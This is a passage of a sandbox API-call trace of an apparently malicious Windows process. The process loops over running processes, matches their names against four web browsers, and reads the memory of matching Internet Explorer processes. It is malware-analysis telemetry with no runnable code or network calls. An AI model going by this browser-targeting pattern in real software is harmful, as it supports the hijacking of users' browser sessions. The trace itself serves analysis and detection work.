	[0200.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.812] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.813] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0200.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.813] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.813] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0200.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1d88
	[0200.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.814] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0200.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.814] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.815] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0200.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.815] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.815] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0200.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1d8c
	[0200.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.816] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0200.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.817] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.817] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0200.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.818] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.818] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0200.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1d90
	[0200.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.819] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0200.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.819] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.820] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0200.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.820] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.820] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0200.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1d94
	[0200.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.821] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0200.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.821] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.822] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0200.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.822] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.823] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0200.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1d98
	[0200.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.823] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0200.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.824] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.824] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0200.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.825] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.825] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0200.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1d9c
	[0200.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.826] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0200.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.826] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.826] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0200.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.827] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.827] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0200.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1da0
	[0200.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.828] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0200.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.828] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.828] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0200.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.829] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.829] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0200.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1da4
	[0200.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.830] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0200.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.831] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.831] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0200.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.832] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0200.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1da8
	[0200.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.833] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0200.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.833] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.834] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0200.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.835] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.835] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0200.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1dac
	[0200.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.836] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0200.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.837] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.837] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0200.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.838] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0200.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1db0
	[0200.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.839] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0200.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.839] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.840] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0200.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.841] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.841] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0200.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1db4
	[0200.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.842] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0200.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.843] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.843] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0200.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.843] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.844] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1db8
	[0200.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.845] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.845] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.845] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.845] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.846] NtQueryInformationProcess (in: ProcessHandle=0x1db8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.846] ReadProcessMemory (in: hProcess=0x1db8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.846] ReadProcessMemory (in: hProcess=0x1db8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.846] ReadProcessMemory (in: hProcess=0x1db8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.846] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.846] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1dbc
	[0200.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.847] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.847] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.847] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.848] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.848] NtQueryInformationProcess (in: ProcessHandle=0x1dbc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.848] ReadProcessMemory (in: hProcess=0x1dbc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.848] ReadProcessMemory (in: hProcess=0x1dbc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.848] ReadProcessMemory (in: hProcess=0x1dbc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.848] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1dc0
	[0200.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.849] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.849] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.850] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.850] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0200.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1dc4
	[0200.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.851] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0200.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.852] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.852] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0200.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.852] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1dc8
	[0200.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.853] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.854] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.854] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.854] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.855] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0200.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1dcc
	[0200.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.856] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.856] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.857] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.857] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1dd0
	[0200.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.858] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.858] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.858] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.859] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0200.860] CloseHandle (hObject=0x188) returned 1
	[0200.860] Sleep (dwMilliseconds=0x64) 
	[0200.961] GetCurrentProcessId () returned 0x110
	[0200.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0200.968] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0200.969] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0200.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0200.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1dd4
	[0200.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.971] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.971] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.972] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.972] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1dd8
	[0200.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.973] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.973] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.973] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.974] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
